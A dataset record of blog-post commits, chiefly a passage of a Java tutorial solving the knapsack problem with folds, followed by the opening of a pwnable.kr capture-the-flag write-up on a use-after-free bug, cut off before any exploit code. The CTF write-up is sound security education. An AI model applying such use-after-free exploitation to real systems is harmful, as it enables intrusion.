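\n\nOne detail worth noting before looking at the class itself: `cons` prepends, so the most recently added element becomes the head, and the list ends up in reverse insertion order (which does not matter for our knapsack, since the algorithm considers all items anyway). Here is a minimal, hypothetical usage sketch of the `List` class shown just below:\n\n[source,java]\n----\n\/\/ Hypothetical usage of the List class below: cons prepends.\npublic static List<String> example() {\n    return List.<String>list() \/\/ ()\n            .cons(\"a\")         \/\/ (a)\n            .cons(\"b\")         \/\/ (b, a)\n            .cons(\"c\");        \/\/ (c, b, a): \"c\" is the head\n}\n----\n\n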
A `Nil` has no property, while a `Cons` has a `head`, which is the first element in the list, and a `tail`, which is the rest of the list:\n\n[source,java]\n----\npublic abstract class List<A> {\n\n public List<A> cons(A a) {\n return new Cons<>(a, this);\n }\n\n private static class Nil<A> extends List<A> {\n\n }\n\n private static class Cons<A> extends List<A> {\n\n private final A head;\n private final List<A> tail;\n\n private Cons(A head, List<A> tail) {\n this.head = head;\n this.tail = tail;\n }\n }\n\n @SuppressWarnings(\"rawtypes\")\n private static List NIL = new List.Nil();\n\n @SuppressWarnings(\"unchecked\")\n public static <A> List<A> list() {\n return NIL;\n }\n}\n----\n\nAs you can see, it is a very simple data structure. The parent class defines a method `cons` adding an element to the list. It also has a static factory method returning an empty list. Note that this method returns an untyped singleton, which means that there can exist only one empty list. As a consequence, all empty lists are considered equal.\n\n== Folding\n\nNow you can see how the list of items is constructed. However, you may wonder how we could ever use this list, since there is no means to access its elements. In fact, we only need one operation: folding the list. Any processing you can imagine on a list may be done with a fold. Folding consists in taking a value of the intended result type (generally different from the element type) and combining it with an element, then combining the result with the next element and so on until all elements have been processed.\n\n=== Folding right or left\n\nWe can fold a list starting from the left (the head of the list) or from the right (the last element of the list). To fold from the left, we use a left associative operation. To fold from the right, we need... well, you guess.\n\nHere is how we can write a `foldRight` method. First the signature in the abstract parent `List` class:\n\n----\npublic abstract <B> B foldRight(B z, BiFunction<A, B, B> f);\n----\n\nThe `z` parameter is the starting result. It is called `z` by convention, meaning \"zero\", by analogy with the starting result for the sum of a list of integers.\n\nThe operation used for the fold is represented by a `BiFunction`, taking an `A` (an element of the list) and a `B` (the current result) and returning a `B` (the next current result). In the `Nil` class, the implementation simply returns `z`, since there is no element to which to apply the function:\n\n[source,java]\n----\npublic <B> B foldRight(B z, BiFunction<A, B, B> f) {\n return z;\n}\n----\n\nIn the `Cons` class, the implementation simply combines the `head` element with the result of a recursive call to fold the `tail`:\n\n[source,java]\n----\npublic <B> B foldRight(B z, BiFunction<A, B, B> f) {\n return f.apply(head, tail.foldRight(z, f));\n}\n----\n\nNote that this implementation is recursive, and recursion happens on the stack, so it will blow the stack for lists of more than a few thousand elements. In my book https:\/\/www.manning.com\/books\/functional-programming-in-java[Functional Programming in Java], I show how to make recursion happen on the heap, but this would be a bit too long for this article. Alternatively, you can have a look at this article: https:\/\/pysaumont.github.io\/2014\/12\/03\/Stack-safe-recursion-in-Java.html[Stack safe recursion in Java].\n\n== Folding, folding, folding...\n\nWith this method, we can solve nearly all the problems we might have to solve. 
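\n\nAs a quick illustration (a hypothetical example of my own, using the classes above), consider summing a list of integers with `foldRight`. Starting from `z = 0`, each element is combined with the result of folding the rest of the list:\n\n[source,java]\n----\n\/\/ Hypothetical example: summing a list of integers with foldRight.\n\/\/ cons prepends, so cons(3).cons(2).cons(1) builds the list (1, 2, 3).\nList<Integer> ints = List.<Integer>list().cons(3).cons(2).cons(1);\nint sum = ints.foldRight(0, (a, b) -> a + b); \/\/ 1 + (2 + (3 + 0)) = 6\n----\n\n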
To understand how we can do this, it's interesting to first show how we can make a copy of the list:\n\n[source,java]\n----\npublic List<A> copy() {\n return foldRight(list(), (a, list) -> list.cons(a));\n}\n----\n\nWe simply start with an empty list and add the elements to it, one after the other, starting from the right.\n\nFor our specific Knapsack problem, we need a `map` method applying a function to all elements of the list. This is exactly like a copy, except that we apply the function before adding each element to the new list:\n\n[source,java]\n----\npublic <B> List<B> map(Function<A, B> f) {\n return foldRight(list(), (a, list) -> list.cons(f.apply(a)));\n}\n----\n\nWe will also need a `flatMap` method doing the same thing with a function returning a list. Here is the implementation:\n\n[source,java]\n----\npublic <B> List<B> flatMap(Function<A, List<B>> f) {\n return foldRight(list(), (a, list) -> list.foldRight(f.apply(a), (a2, list2) -> list2.cons(a2)));\n}\n----\n\nThis may look a bit complicated, but it is in fact equivalent to the following, where the `concat` method is used to create a single list by concatenating two lists:\n\n[source,java]\n----\npublic <B> List<B> flatMap(Function<A, List<B>> f) {\n return foldRight(list(), (a, list) -> list.concat(f.apply(a)));\n}\n\npublic List<A> concat(List<A> list) {\n return foldRight(list, (a, acc) -> acc.cons(a));\n}\n----\n\nWe will also need a method to return the length of the list:\n\n[source,java]\n----\nprivate int length() {\n return foldRight(0, (a, length) -> length + 1);\n}\n----\n\nHere, we ignore the elements, simply adding one to the result at each step. (Note that this is a very inefficient way to get the length of a list. Using memoization is much faster, although it uses more memory.)\n\nFinally, we will need to access the `head` and the `tail` of the list. But we can't simply add methods for this, since we would not know what to return in the `Nil` class. For the tail, we could return an empty list, but what about the `head`?\n\nA (temporary!) solution is to return a `List<A>` for the head, which will either be an empty list, for a `Nil`, or a list containing a single element, in case of a `Cons`. Here is the implementation:\n\n[source,java]\n----\npublic List<A> head() {\n return foldRight(list(), (a, list) -> list.length() == 0\n ? list.cons(a)\n : list);\n}\n----\n\nFor the `tail`, we will return a `List<List<A>>`:\n\n[source,java]\n----\npublic List<List<A>> tail() {\n return new Cons<>(foldRight(list(), (a, list) -> list.length() == 0\n ? list\n : list.cons(a)), list());\n}\n----\n\nThese methods are really not very efficient, but the point is just to show that everything can be done with a fold. We will optimize them later.\n\nWe now have all the elements we need.\n\n== The heart of the problem\n\nNow, you might think we are left with the hard part: implementing the `pack` method. First, let's look at the algorithm:\n\n- look at the first element. If it does not fit into the knapsack, discard it.\n\n- if it fits, let's make two different computations:\n\n * first, add the element to the knapsack and continue with the rest of the list.\n\n * second, discard the element and continue with the rest of the list.\n\n * compare the values of the two results, select the highest, and return it.\n\nCould it be simpler? 
Here is the corresponding implementation:\n\n[source,java]\n----\nprivate static Knapsack pack(List<Item> items, Knapsack knapsack) {\n return items.head().flatMap(item -> items.tail().map(itemList -> knapsack.canAccept(item)\n ? pack(itemList, knapsack).maxValue(pack(itemList, knapsack.add(item)))\n : pack(itemList, knapsack))).foldRight(knapsack, (a, b) -> a);\n}\n----\n\nThe only weird thing to note is that our algorithm returns a list containing the resulting knapsack, so we extract it with `foldRight(knapsack, (a, b) -> a)`.\n\nWe're done, and the core of our program has only three lines. (It could be written in only one line!) The `List` class is not at all specific to our program and could be used as part of a future functional library. The rest of the code (the `Item` class and the rest of the `Knapsack` class) belongs to the business model, and is only a description of our business data. Here is an example of what our program displays:\n\n----\nTotal value: 1030.0\nTotal weight: 396\nItems:\n item(map, 9, 150.0)\n item(compass, 13, 35.0)\n item(water, 153, 200.0)\n item(sandwich, 50, 160.0)\n item(glucose, 15, 60.0)\n item(banana, 27, 60.0)\n item(cream, 11, 70.0)\n item(trousers, 42, 70.0)\n item(overclothes, 43, 75.0)\n item(notecase, 22, 80.0)\n item(sunglasses, 7, 20.0)\n item(socks, 4, 50.0)\n----\n\n== About the head and tail methods\n\nFor these methods, we chose to return lists in order to be able to represent the absence of data. The main problem with this approach is that there is no means to ensure that some additional data will not be inserted by mistake in these lists. To avoid this, we generally use a different class, called `Option`, which is exactly like a `List` but where the `Nil` class is called `None` and the `Cons` class is called `Some` and has no tail. Other than this, it is exactly the same, except for the `fold` method, which is called something else, like `getOrElse`, and doesn't take a function. (Or uses the default \"identity\" function, to be more accurate.) Besides this, it is sometimes difficult to distinguish between real lists (that can have several elements) and \"option\" lists (that can have at most one). This may make the program more difficult to read. On the other hand, it makes it much easier to compose the two cases, since they are represented by the same type. In a later article, I'll show in detail what this means.\n\n== The limitations of this solution\n\nI have already indicated that since this program is recursive, and recursion in Java occurs on the stack, and since the stack has a very limited size, this program will not work for much more than two or three thousand items. This may not seem to be a concern, since a knapsack generally contains far fewer items, but the problem is in fact much more general. It could be used to optimize the way to cut ropes or rods into pieces (while minimizing the loss), or to divide any quantity in the most efficient manner.\n\nRecursion is sometimes called the `goto` of functional programming. This does not mean it should not be used, but that it should be abstracted. This is exactly what `foldRight` does. In other words, it is perfectly acceptable to use recursion inside the list class, although it probably should be used only once or twice. But using it in a business program is generally a bad practice. Moreover, in real life, if we are using Java, we might want to optimize the fold for performance, using standard Java loops. 
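\n\nAs an illustration only (and deliberately the kind of imperative code the rest of this article avoids), a stack-safe, loop-based left fold might look like the following sketch, assuming it lives inside the `List` class, where the `head` and `tail` fields of `Cons` are accessible:\n\n[source,java]\n----\n\/\/ Sketch only: an imperative, stack-safe fold hidden inside the List class.\n\/\/ The mutable locals never leak: seen from outside, the method is pure.\npublic <B> B foldLeft(B z, BiFunction<B, A, B> f) {\n B result = z;\n List<A> remaining = this;\n while (remaining instanceof Cons) {\n @SuppressWarnings(\"unchecked\")\n Cons<A> cons = (Cons<A>) remaining;\n result = f.apply(result, cons.head);\n remaining = cons.tail;\n }\n return result;\n}\n----\n\n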
In such a case, it would be even more important to encapsulate these \"dirty\" parts in the `List` class. Or, as I already said, we can make recursion happen on the heap rather than on the stack. To learn how to do this, please refer to my book, https:\/\/www.manning.com\/books\/functional-programming-in-java[Functional Programming in Java], or to this article: http:\/\/www.fpinjava.com\/2014\/12\/03\/Stack-safe-recursion-in-Java.html[Stack safe recursion in Java].\n\nThis said, there is a much more radical limitation in this example. If you examine the `pack` method, you will see that it is bi-recursive, which means it calls itself twice. This means that for the first level, there will be two calls. Each of these two calls will trigger two new calls, for a total of four. It is not difficult to see that this number of calls will grow exponentially. The consequence is that this program will not overflow the stack, because it will never run long enough for this. It will not work for more than around thirty items. To make this program really useful, we must find a way to write it with a single recursive call, or, better, not using recursion at all (besides recursion in the `List` class). This is what I will show in a later article.","old_contents":"= Folding the Universe, part I\n:published_at: 2016-06-11\n\nFolding the Universe is actually the title of a book by Peter Engel which is subtitled \"Origami From Angelfish to Zen\", suggesting that anything in the universe may be modelled out of folded paper. The analogy with computer programming is interesting since, in functional programming, nearly every problem can be solve with folds.\n\nComputer programming is primarily about abstraction. Instead of doing the same basic tasks again an again, we once write programs to performs these tasks, and we can then build larger programs by composing these basic tasks. Probably one difference between functional and imperative programmers is the way they handle task abstractions. Most often, imperative programmers start thinking about abstracting subtasks when they realize that they are repeatedly writing the same code. But the depth of abstraction is often kept quite minimal. The main reason is that higher level abstractions are generally provided by the language. Arithmetic operations on integers, for example, is provided by nearly all programming languages, so there is no need to write specific code to abstract them (although it is possible, and and an interesting challenge!).\n\nLoops are another kind of abstraction that is provided by many languages. Most imperative programmers would not believe that there exist programming languages without loops. Is it possible to program without loops? Of course, it is. It is even possible to program with absolutely no control structures.\n\nMaybe you think that it is possible in some very specific languages specially designed for this. Nothing could be more wrong. Take Java, for example. It is perfectly possible to write any program without ever using a for loop, a while loop, a switch case selector, or event an if..else construct. You don't believe it? Read on.\n\nNot only you can write java program without any control structure, but you can also completely avoid variables. Is this useful? Well, avoiding variables is indeed very useful to write safer concurrent programs since it frees us from all concurrency problems, such as deadlock, livelocks, stale data, races, corruption and more. 
Avoiding control structures also brings many advantages, but it is more difficult to make it evident. Evidence comes with usage. But in all cases, it is a very rewarding challenge. So why not give it a try?\n\nIf you are the kind of programmer who think in terms of best practices, design patterns, productivity through the use of multiple libraries, or if you have ever thought that \"this is not the way Java (or anything else) has been intended to be used\", or if you think that we should never try to reinvent the wheel, you should probably not continue reading. (By the way, if the wheel had not been reinvented many times, it would still be circular and spinning around its center, so there would be no cars, no trains, nor anything else using modern wheels, but this is another story.\n\n== The challenge\n\nThe challenge is to solve a well known computer problem while using no variables (only constants) and no control structures. We can create classes and methods, we can use the arithmetic operations and comparisons (we could do without, but we would have to design a whole number system with operators, based on folds, which is perfectly feasible, but a bit cumbersome. We will use Java 8 `Function` and `BiFunction`, because creating ours would be a waste of time (but minimal, since this would need only three lines of code each).\n\nThe problem to solve is known as the Knapsack problem. Basically, it consist in packing a knapsack with items in the best possible manner. The knapsack has a maximum capacity, and each item has a name, a weight and a value. The goal is to pack the maximum value in the knapsack without exceeding its capacity. If you want to get an idea of how to solve this in a traditional imperative manner in Java, you can look at this example: https:\/\/rosettacode.org\/wiki\/Knapsack_problem\/0-1#Java[Knapsack problem\/0-1]. I strongly encourage you to look at the example to have an idea of how this problem may be solved in imperative style in just 300 lines of code.\n\n== How to handle the problem\n\nFirst, we will define the business objects. Although being functional, our program will still be object oriented. The first thing we will need is a class to represent items. It will be a very basic class:\n\n[source,java]\n----\npublic class Item {\n public final String name;\n public final int weight;\n public final double value;\n\n private Item(String name, int weight, double value) {\n this.name = name;\n this.weight = weight;\n this.value = value;\n }\n\n public String toString() {\n return String.format(\"item(%s, %s, %s)\", name, weight, value);\n }\n\n public static Item item(String name, int weight, double value) {\n return new Item(name, weight, value);\n }\n}\n----\n\nIf you don't like public fields, feel free to make them private an write the corresponding getters. It is absolutely useless, however, just making the code longer. Note that the factory method is for convenience. It generally allows putting validation code, which we do not have here. The `toString` method is also for convenience, in order to print the result. 
In fact, there is absolutely no logic here.\n\nThen, we need a class to represent the knapsack:\n\n[source,java]\n----\npublic class Knapsack {\n\n private final List<Item> items;\n private final double value;\n private final int weight;\n private final int available;\n\n private Knapsack(double value, List<Item> items, int weight, int available) {\n this.value = value;\n this.items = items;\n this.weight = weight;\n this.available = available;\n }\n\n private Knapsack add(Item item) {\n return new Knapsack(this.value + item.value, this.items.cons(item), this.weight + item.weight, this.available - item.weight);\n }\n\n private boolean canAccept(Item item) {\n return item.weight <= this.available;\n }\n\n private Knapsack maxValue(Knapsack that) {\n return this.value >= that.value ? this : that;\n }\n\n public String toString() {\n return String.format(\"Total value: %s\\nTotal weight: %s\\nItems:\\n%s\",\n value, weight, items.foldRight(\"\",\n (item, string) -> String.format(\"\\t%s\\n%s\", item, string)));\n }\n\n private static Knapsack empty(int capacity) {\n return new Knapsack(0.0, List.list(), 0, capacity);\n }\n\n private static Knapsack pack(List<Item> items, Knapsack knapsack) {\n ...\n }\n\n public static Knapsack pack(List<Item> items, int knapsackCapacity) {\n return pack(items, empty(knapsackCapacity));\n }\n}\n----\n\nAs you can see, a `Knapsack` has four properties: a list of items, a value, a weight, and an available capacity, meaning how much weight can be added before the knapsack is full. The `value` and `weight` fields are for convenience and optimization. We could compute them each time we need them, but it would waste time. They are used for memoization of the weight an value, which trades times against memory space.\n\nThe constructor is private, and we have only one factory method called `empty` that creates an empty knapsack. Adding an item to the knapsack is done through the `add` method, which does not mutate anything but creates and returns a new `Knapsack` with the updated value. You might argue that the `List<Item>` is mutated, but it is not, because it is not a Java `List`. More on this later.\n\nThere are three utility methods: `canAccept(Item)` allows knowing if the knapsack has enough available capacity to receive a given item. The `maxValue` method compares two `Knapsack` instances and returns the one with the greatest value. The `toString` method, of course, returns a readable representation of the knapsack. All these methods are for convenience and could be avoided.\n\nThe interesting part is the `pack` method, which takes a list of items and a `Knapsack` and returns the `Knapsack` (in fact a new one) with as much value as possible packed in it. Plus, there is a convenience `pack` method taking a list of items and a capacity.\n\nBefore looking at the core of the problem (the `pack` method), lets see how this program will be used:\n\n[source,java]\n----\n public static void main(String... 
args) {\n\n int capacity = 400;\n\n final List<Item> items = List.<Item>list()\n .cons(Item.item(\"map\", 9, 150.0))\n .cons(Item.item(\"compass\", 13, 35.0))\n .cons(Item.item(\"water\", 153, 200.0))\n .cons(Item.item(\"sandwich\", 50, 160.0))\n .cons(Item.item(\"glucose\", 15, 60.0))\n .cons(Item.item(\"tin\", 68, 45.0))\n .cons(Item.item(\"banana\", 27, 60.0))\n .cons(Item.item(\"apple\", 39, 40.0))\n .cons(Item.item(\"cheese\", 23, 30.0))\n .cons(Item.item(\"beer\", 52, 10.0))\n .cons(Item.item(\"cream\", 11, 70.0))\n .cons(Item.item(\"camera\", 32, 30.0))\n .cons(Item.item(\"tshirt\", 24, 15.0))\n .cons(Item.item(\"trousers\", 48, 10.0))\n .cons(Item.item(\"umbrella\", 73, 40.0))\n .cons(Item.item(\"trousers\", 42, 70.0))\n .cons(Item.item(\"overclothes\", 43, 75.0))\n .cons(Item.item(\"notecase\", 22, 80.0))\n .cons(Item.item(\"sunglasses\", 7, 20.0))\n .cons(Item.item(\"towel\", 18, 12.0))\n .cons(Item.item(\"socks\", 4, 50.0))\n .cons(Item.item(\"book\", 30, 10.0));\n\n System.out.println(Knapsack.pack(items, capacity));\n }\n}\n----\n\nAs you can see, it is very simple, although the way the list is constructed may look a bit weird. As mentioned earlier, this is not a Java `List`, but a functional singly linked list. It is represented by an abstract `List` class and two internal subclasses, `Nil` and `Cons`, representing the empty and non-empty list. A `Nil` has no properties, while a `Cons` has a `head`, which is the first element in the list, and a `tail`, which is the rest of the list:\n\n[source,java]\n----\npublic abstract class List<A> {\n\n public List<A> cons(A a) {\n return new Cons<>(a, this);\n }\n\n private static class Nil<A> extends List<A> {\n\n }\n\n private static class Cons<A> extends List<A> {\n\n private final A head;\n private final List<A> tail;\n\n private Cons(A head, List<A> tail) {\n this.head = head;\n this.tail = tail;\n }\n }\n\n @SuppressWarnings(\"rawtypes\")\n private static List NIL = new List.Nil();\n\n @SuppressWarnings(\"unchecked\")\n public static <A> List<A> list() {\n return NIL;\n }\n}\n----\n\nAs you can see, it is a very simple data structure. The parent class defines a method `cons` that adds an element at the front of the list. It also has a static factory method returning an empty list. Note that this method returns an untyped singleton, which means that there can exist only one empty list. As a consequence, all empty lists are considered equal.\n\n== Folding\n\nNow you can see how the list of items is constructed. However, you may wonder how we could ever use this list, since there is no means to access its elements. In fact, we only need one operation: folding the list. Any processing you can imagine on a list may be done with a fold. Folding consists of taking a value of the intended result type (generally different from the element type) and combining it with the first element, then combining the result with the second element, and so on until all elements have been processed.\n\n=== Folding right or left\n\nWe can fold a list starting from the left (the head of the list) or from the right (the last element of the list). To fold from the left, we need a left-associative operation. To fold from the right, we need... well, you can guess.
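\n\nTo make the difference concrete, here is a small example (a sketch that relies on the `List` class above and the `foldRight` method defined next; the left fold result is only given in a comment, since we will not need to implement `foldLeft`):\n\n[source,java]\n----\n\/\/ Folding the list (1, 2, 3) with subtraction, starting from z = 0.\n\/\/ A right fold groups to the right: 1 - (2 - (3 - 0)) = 2.\n\/\/ A left fold would group to the left: ((0 - 1) - 2) - 3 = -6.\nList<Integer> numbers = List.<Integer>list().cons(3).cons(2).cons(1);\nint result = numbers.foldRight(0, (a, b) -> a - b); \/\/ 2\n----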
\n\nHere is how we can write a `foldRight` method. First, the signature in the abstract parent `List` class:\n\n[source,java]\n----\npublic abstract <B> B foldRight(B z, BiFunction<A, B, B> f);\n----\n\nThe `z` parameter is the starting result. It is called `z` by convention, meaning \"zero\", which would be the starting result for the sum of a list of integers.\n\nThe operation used for the fold is represented by a `BiFunction`, taking an `A` (an element of the list) and a `B` (the current result) and returning a `B` (the next current result). In the `Nil` class, the implementation simply returns `z`, since there is no element to which to apply the function:\n\n[source,java]\n----\npublic <B> B foldRight(B z, BiFunction<A, B, B> f) {\n return z;\n}\n----\n\nIn the `Cons` class, the implementation simply combines the `head` element with the result of a recursive call to fold the `tail`:\n\n[source,java]\n----\npublic <B> B foldRight(B z, BiFunction<A, B, B> f) {\n return f.apply(head, tail.foldRight(z, f));\n}\n----\n\nNote that this implementation is recursive, and recursion happens on the stack, so it will blow the stack for lists of more than a few thousand elements. In my book https:\/\/www.manning.com\/books\/functional-programming-in-java[Functional Programming in Java], I show how to make recursion happen on the heap, but this would be a bit too long for this article.\n\n== Folding, folding, folding...\n\nWith this method, we can solve nearly all the problems we might have to solve. To understand how, it is interesting to first show how we can make a copy of the list, although we will not need this:\n\n[source,java]\n----\npublic List<A> copy() {\n return foldRight(list(), (a, list) -> list.cons(a));\n}\n----\n\nWe simply start with an empty list and add the elements to it, one after the other, starting from the right.\n\nFor our specific problem, we will need a `map` method applying a function to all elements of the list. This is exactly like a copy, except that we apply the function before inserting each element in the new list:\n\n[source,java]\n----\npublic <B> List<B> map(Function<A, B> f) {\n return foldRight(list(), (a, list) -> list.cons(f.apply(a)));\n}\n----\n\nWe will also need a `flatMap` method doing the same thing with a function returning a list. Here is the implementation:\n\n[source,java]\n----\npublic <B> List<B> flatMap(Function<A, List<B>> f) {\n return foldRight(list(), (a, list) -> list.foldRight(f.apply(a), (a2, list2) -> list2.cons(a2)));\n}\n----\n\nThis may look a bit complicated, but it is in fact equivalent to the following, where the `concat` method is used to create a single list by concatenating two lists:\n\n[source,java]\n----\npublic <B> List<B> flatMap(Function<A, List<B>> f) {\n return foldRight(list(), (a, list) -> list.concat(f.apply(a)));\n}\n\npublic List<A> concat(List<A> list) {\n return foldRight(list, (a, acc) -> acc.cons(a));\n}\n----\n\nWe will also need a method to return the length of the list:\n\n[source,java]\n----\nprivate int length() {\n return foldRight(0, (a, length) -> length + 1);\n}\n----\n\nHere, we ignore the elements, simply adding one to the result at each step. (Note that this is a very inefficient way to get the length of a list. Using memoization is much faster, although it uses more memory.)
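\n\nTo give an idea, here is one possible memoizing `Cons` (an illustration only, not part of this article's `List`; it assumes `length()` is made an overridable method returning 0 in `Nil`):\n\n[source,java]\n----\nprivate static class Cons<A> extends List<A> {\n\n private final A head;\n private final List<A> tail;\n private final int length; \/\/ memoized once at construction time\n\n private Cons(A head, List<A> tail) {\n this.head = head;\n this.tail = tail;\n this.length = tail.length() + 1; \/\/ one addition per cell, never recomputed\n }\n\n protected int length() {\n return length; \/\/ O(1), no fold needed\n }\n}\n----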
\n\nFinally, we will need to access the `head` and the `tail` of the list. But we can't simply add methods for this, since we would not know what to return in the `Nil` class. For the tail, we could return an empty list, but what about the `head`?\n\nThe solution is to return a `List<A>` for the head, which will either be an empty list, in the case of a `Nil`, or a list containing a single element, in the case of a `Cons`. Here is the implementation:\n\n[source,java]\n----\npublic List<A> head() {\n return foldRight(list(), (a, list) -> list.length() == 0\n ? list.cons(a)\n : list);\n}\n----\n\nFor the `tail`, we will return a `List<List<A>>`:\n\n[source,java]\n----\npublic List<List<A>> tail() {\n return new Cons<>(foldRight(list(), (a, list) -> list.length() == 0\n ? list\n : list.cons(a)), list());\n}\n----\n\nThese methods are really not very efficient, but the point is to show that everything can be done with a fold. We will optimize them later.\n\nWe now have all the elements we need.\n\n== The heart of the problem\n\nNow, you might think we are left with the hard part: implementing the `pack` method. First, let's look at the algorithm:\n\n- look at the first element. If it does not fit in the knapsack, discard it.\n\n- if it fits, let's make two different computations:\n\n * first, add the element to the knapsack and continue with the rest of the list.\n\n * second, discard the element and continue with the rest of the list.\n\n * then compare the values of the two results, select the highest, and return it.\n\nCould it be any simpler? Here is the corresponding implementation:\n\n[source,java]\n----\nprivate static Knapsack pack(List<Item> items, Knapsack knapsack) {\n return items.head().flatMap(item -> items.tail().map(itemList -> knapsack.canAccept(item)\n ? pack(itemList, knapsack).maxValue(pack(itemList, knapsack.add(item)))\n : pack(itemList, knapsack))).foldRight(knapsack, (a, b) -> a);\n}\n----\n\nThe only odd thing to note is that our algorithm returns a list containing the resulting knapsack, so we extract it with `foldRight(knapsack, (a, b) -> a)`.\n\nWe're done, and the core of our program has only three lines. (It could be written in only one line!) The `List` class is not at all specific to our program and will be used as part of our future functional library. The rest of the code (the `Item` class and the rest of the `Knapsack` class) belongs to the business model, and is only a description of our business data. Here is an example of what our program displays:\n\n----\nTotal value: 1030.0\nTotal weight: 396\nItems:\n item(map, 9, 150.0)\n item(compass, 13, 35.0)\n item(water, 153, 200.0)\n item(sandwich, 50, 160.0)\n item(glucose, 15, 60.0)\n item(banana, 27, 60.0)\n item(cream, 11, 70.0)\n item(trousers, 42, 70.0)\n item(overclothes, 43, 75.0)\n item(notecase, 22, 80.0)\n item(sunglasses, 7, 20.0)\n item(socks, 4, 50.0)\n----\n\n== About the head and tail methods\n\nFor these methods, we chose to return lists in order to be able to represent the absence of data. The main problem with this approach is that there is no way to ensure that some additional data will not be inserted by mistake into these lists. To avoid this, we generally use a different class, called `Option`, which is exactly like a `List` but where the `Nil` class is called `None` and the `Cons` class is called `Some` and has no tail. Other than this, it is exactly the same, except for the fold method, which is called something else, like `getOrElse`. Besides this, with lists playing both roles, it is sometimes difficult to distinguish between real lists (which can have several elements) and \"option\" lists (which can have at most one). This may make the program more difficult to read. On the other hand, it makes it much easier to compose the two cases. In a future article, I'll show in detail what this means.
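\n\nBefore moving on, here is a minimal sketch of what such an `Option` class could look like (an illustration only; a real implementation would offer a few more methods):\n\n[source,java]\n----\npublic abstract class Option<A> {\n\n \/\/ The fold, under a more familiar name: return the value if present,\n \/\/ or the given default otherwise.\n public abstract A getOrElse(A defaultValue);\n\n private static class None<A> extends Option<A> {\n\n public A getOrElse(A defaultValue) {\n return defaultValue;\n }\n }\n\n private static class Some<A> extends Option<A> {\n\n private final A value;\n\n private Some(A value) {\n this.value = value;\n }\n\n public A getOrElse(A defaultValue) {\n return value;\n }\n }\n}\n----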
\n\n== The limitations of this solution\n\nI have already indicated that since this program is recursive, and recursion in Java occurs on the stack, and since the stack has a very limited size, this program will not work for much more than two or three thousand items. This may not be a concern, since a knapsack generally contains far fewer, but the problem is in fact much more general. It could be used to optimize the way ropes or rods are cut into pieces (while minimizing the loss), or to divide any quantity in the most efficient manner.\n\nRecursion is sometimes called the `goto` of functional programming. This does not mean it should not be used, but that it should be abstracted. This is exactly what `foldRight` and `foldLeft` do. In other words, it is perfectly acceptable to use recursion inside the list class, although it probably should be used only once or twice. But using it in a business program is generally a bad practice. Moreover, in real life, if we are using Java, we might want to optimize the fold for performance, using standard Java loops. In such a case, it would be even more important to encapsulate these \"dirty\" parts in the `List` class. Or, as I already said, we can make recursion happen on the heap rather than on the stack. To learn how to do this, please refer to my book, https:\/\/www.manning.com\/books\/functional-programming-in-java[Functional Programming in Java], or to this article: http:\/\/www.fpinjava.com\/2014\/12\/03\/Stack-safe-recursion-in-Java.html[Stack safe recursion in Java].\n\nThat said, there is a much more radical limitation in our example. If you examine the `pack` method, you will see that it is bi-recursive, which means it calls itself twice. This means that at the first level, there will be two calls. Each of these two calls will trigger two new calls, for a total of four. It is not difficult to see that the number of calls grows exponentially: for n items, it is on the order of 2^n^, so thirty items already mean about a billion calls. The consequence is that this program will not overflow the stack, because it will never run long enough for that. It will not work for more than around thirty items. To make this program really useful, we must find a way to write it with a single recursive call, or, better, not using recursion at all. 
This is what I will show in a future article.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"91431b39edfa3fbf545594c0582b905dcc00c22d","subject":"Update 2017-05-24-Use-After-Free-fun-in-glibc.adoc","message":"Update 2017-05-24-Use-After-Free-fun-in-glibc.adoc","repos":"icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io","old_file":"_posts\/2017-05-24-Use-After-Free-fun-in-glibc.adoc","new_file":"_posts\/2017-05-24-Use-After-Free-fun-in-glibc.adoc","new_contents":"= Pwnable.kr - UAF Writeup \n\/\/See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase content\/ for information about the parameters.\n:hp-image: \/images\/covers\/space.jpg\n:published_at: 2017-05-24\n:hp-tags: use-after-free, pwnable.kr, ctf, writeups\n:hp-alt-title: Use-After-Free fun in glibc!\n\n#### Challenge Description: \n> Mommy, what is Use After Free bug?\n> ssh uaf@pwnable.kr -p2222 (pw:guest)\n\n#### First Impressions: \n\nimage::\/images\/blog\/uaf\/uaf1.png[\"The Challenge Directory\"]\n\nHere we find the usual readable source code, executable binary, and unreadable flag.\n\nLooking at the source code, we see that it defines a simple virtual class (Human) and its two subclasses (Man\/Woman).\n\nimage::\/images\/blog\/uaf\/main.png[\"The uaf\/cpp main() function\"]\n\nThe switch block is what's interesting to us at the moment.\nWe are prompted with three options:\n\n> [1] Call the *introduce()* method of both the Man and Woman objects.\n\nNotice that both the Man* and Woman* from the *new* keyword are cast to *Human**. Clearly, these objects are in the same class hierarchy, and Human is a common superclass. Further still, notice that we call introduce(), _a function with the same prototype, using two upcasted objects._ Either we are calling the *introduce()* method of the Human class, or there's some as yet unseen polymorphism mechanism that de-obfuscates our function call. 
Running the code, you can see that *Man->introduce()* and *Woman->introduce()* _do not produce the same output for identical calls_; therefore, *they must be virtual functions.*\n\n(This is, of course, extremely obvious because the classes are both defined in this same readable file, but you can still figure out a lot without the class definitions.)\n\n> [3] Delete (and deconstruct) both the Man and Woman objects.\n\nHuh, so we can delete the objects, then use their newly invalidated pointers to call a function.\n\nimage::\/images\/blog\/uaf\/segfault.png[\"Segfault by accessing a dangling pointer.\"]\n\nSo, it's clearly possible to _use_ our pointers _after they are free'd_, but what weirdness can we cause with this?\nWell, this is where you would start googling \"use after free\", and eventually you might find link:https:\/\/sploitfun.wordpress.com\/2015\/02\/10\/understanding-glibc-malloc\/[this extremely good article on glibc's malloc() internals], and link:https:\/\/sourceware.org\/glibc\/wiki\/MallocInternals[this very handy reference for glibc malloc()], both of which are required reading to understand the rest of this exploit and write-up.\n","old_contents":"= Pwnable.kr - UAF Writeup \n\/\/See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase content\/ for information about the parameters.\n:hp-image: \/images\/covers\/space.jpg\n:published_at: 2017-05-24\n:hp-tags: use-after-free, pwnable.kr, ctf, writeups\n:hp-alt-title: Use-After-Free fun in glibc!\n\n#### Challenge Description: \n> Mommy, what is Use After Free bug?\n> ssh uaf@pwnable.kr -p2222 (pw:guest)\n\n#### First Impressions: \n\nimage::\/images\/blog\/uaf\/uaf1.png[\"The Challenge Directory\"]\n\nHere we find the usual readable source code, executable binary, and unreadable flag.\n\nLooking at the source code we see that it defines a simple virtual class (Human) and its two subclasses 